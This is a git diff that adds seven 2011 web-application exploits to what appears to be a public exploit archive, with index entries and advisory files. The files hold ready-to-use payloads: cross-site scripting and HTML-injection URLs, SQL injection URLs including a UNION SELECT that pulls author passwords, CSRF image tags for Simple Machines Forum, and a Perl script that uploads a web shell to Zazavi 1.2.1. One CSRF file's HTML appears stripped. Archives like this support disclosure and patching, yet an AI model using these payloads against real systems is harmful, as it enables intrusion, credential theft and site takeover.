diff --git a/files.csv b/files.csv
index ea994db89..8785d7c36 100755
--- a/files.csv
+++ b/files.csv
@@ -32514,3 +32514,10 @@ id,file,description,date,author,platform,type,port
36075,platforms/windows/remote/36075.py,"Freefloat FTP Server 'ALLO' Command Remote Buffer Overflow Vulnerability",2011-08-20,Black.Spook,windows,remote,0
36076,platforms/php/webapps/36076.txt,"Concrete 5.4.1 1 'rcID' Parameter Cross Site Scripting Vulnerability",2011-08-22,"Aung Khant",php,webapps,0
36077,platforms/php/webapps/36077.txt,"Open Classifieds 1.7.2 Multiple Cross Site Scripting Vulnerabilities",2011-08-23,"Yassin Aboukir",php,webapps,0
+36079,platforms/php/webapps/36079.txt,"CommodityRentals Real Estate Script 'txtsearch' Parameter HTML Injection Vulnerability",2011-08-24,"Eyup CELIK",php,webapps,0
+36080,platforms/php/webapps/36080.txt,"Tourismscripts Hotel Portal 'hotel_city' Parameter HTML Injection Vulnerability",2011-08-24,"Eyup CELIK",php,webapps,0
+36081,platforms/php/webapps/36081.txt,"VicBlog 'tag' Parameter SQL Injection Vulnerability",2011-08-24,"Eyup CELIK",php,webapps,0
+36082,platforms/php/webapps/36082.pl,"Zazavi 1.2.1 'filemanager/controller.php' Arbitrary File Upload Vulnerability",2011-08-25,KedAns-Dz,php,webapps,0
+36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 '[img]' BBCode Tag Cross Site Request Forgery Vulnerability",2011-08-25,"Christian Yerena",php,webapps,0
+36084,platforms/php/webapps/36084.html,"Mambo CMS 4.6.5 'index.php' Cross-Site Request Forgery Vulnerability",2011-08-26,Caddy-Dz,php,webapps,0
+36085,platforms/php/webapps/36085.txt,"phpWebSite <= 1.7.1 'mod.php' SQL Injection Vulnerability",2011-08-27,Ehsan_Hp200,php,webapps,0
diff --git a/platforms/php/webapps/36079.txt b/platforms/php/webapps/36079.txt
new file mode 100755
index 000000000..3b1126625
--- /dev/null
+++ b/platforms/php/webapps/36079.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49296/info
+
+Real Estate Script is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+"/>>
\ No newline at end of file
diff --git a/platforms/php/webapps/36080.txt b/platforms/php/webapps/36080.txt
new file mode 100755
index 000000000..a5f1a2f00
--- /dev/null
+++ b/platforms/php/webapps/36080.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49297/info
+
+Hotel Portal is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
+
+http://www.example.com/city.php?hotel_city=%22%2F%3E%3C%2Fa%3E%3C%2F%3E%3Cimg+src%3D1.gif+onerror%3Dalert%281%29%3E&dayfrom=23&monthfrom=8&yearfrom=2011&dayback=24&monthback=8&yearback=2011&guest=1&rooms=1&hotel_stars=&pricefrom=0&pricetill=250&B1=Search
\ No newline at end of file
diff --git a/platforms/php/webapps/36081.txt b/platforms/php/webapps/36081.txt
new file mode 100755
index 000000000..6b23ebb26
--- /dev/null
+++ b/platforms/php/webapps/36081.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49304/info
+
+VicBlog is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+http://www.example.com/vicblog/index.php?page=posts&tag=1%27
\ No newline at end of file
diff --git a/platforms/php/webapps/36082.pl b/platforms/php/webapps/36082.pl
new file mode 100755
index 000000000..f8bc5cbc1
--- /dev/null
+++ b/platforms/php/webapps/36082.pl
@@ -0,0 +1,44 @@
+source: http://www.securityfocus.com/bid/49309/info
+
+Zazavi is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.
+
+Zazavi 1.2.1 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/perl
+system ("title KedAns-Dz");
+system ("color 1e");
+system ("cls");
+use strict;
+use warnings;
+use LWP::UserAgent;
+use HTTP::Request::Common;
+print <> Provided By KedAns-Dz << |
+|= e-mail : ked-h[at]hotmail.com |
+|==========================================|
+INTRO
+print "\n";
+print "[*] Enter URL(f.e: http://target.com): ";
+ chomp(my $url=);
+print "\n";
+print "[*] Enter File Path (f.e: C:\\Shell.php.gif): "; # File Path For Upload (usage : C:\\Sh3ll.php.gif)
+ chomp(my $file=);
+my $ua = LWP::UserAgent->new;
+my $re = $ua->request(POST $url.'/admin/editor/filemanager/controller.php',
+ Content_Type => 'multipart/form-data',
+ Content =>
+ [
+ action => 'uploadFile',
+ newfile => 'DzOffendersCr3w.php',
+ filepath => $file,
+ ] );
+print "\n";
+if($re->is_success) {
+ if( index($re->content, "Disabled") != -1 ) { print "[+] Exploit Successfull! File Uploaded!\n"; }
+ else { print "[-] File Upload Is Disabled! Failed!\n"; }
+} else { print "[-] HTTP request Failed!\n"; }
+exit;
\ No newline at end of file
diff --git a/platforms/php/webapps/36083.txt b/platforms/php/webapps/36083.txt
new file mode 100755
index 000000000..1954aa396
--- /dev/null
+++ b/platforms/php/webapps/36083.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/49311/info
+
+Simple Machines Forum is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.
+
+Simple Machines Forum 2.0 and 1.1.14 are vulnerable; other versions may be affected.
+
+[img]http://www.example.com/index.php?sa=editBuddies;remove=102;action%00=profile[/img]
+
+[img]http://www.example.com/community/index.php?action%00=logout;token[/img]
\ No newline at end of file
diff --git a/platforms/php/webapps/36084.html b/platforms/php/webapps/36084.html
new file mode 100755
index 000000000..25c5b6ff8
--- /dev/null
+++ b/platforms/php/webapps/36084.html
@@ -0,0 +1,44 @@
+source: http://www.securityfocus.com/bid/49315/info
+
+Mambo CMS is prone to a cross-site request-forgery vulnerability.
+
+Attackers can exploit this issue by tricking an unsuspecting user into visiting a malicious Web page. The page will consist of specially crafted script code designed to perform some action on the attacker's behalf.
+
+Successful exploits will allow attackers to run privileged commands on the affected device.
+
+Mambo CMS 4.6.5 is vulnerable; other versions may also be affected.
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/36085.txt b/platforms/php/webapps/36085.txt
new file mode 100755
index 000000000..a7ede3bc5
--- /dev/null
+++ b/platforms/php/webapps/36085.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49354/info
+
+phpWebSite is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/mod.php?mod=publisher&op=allmedia&artid=-1 union select concat(aid,0x3a,pwd) from authors
\ No newline at end of file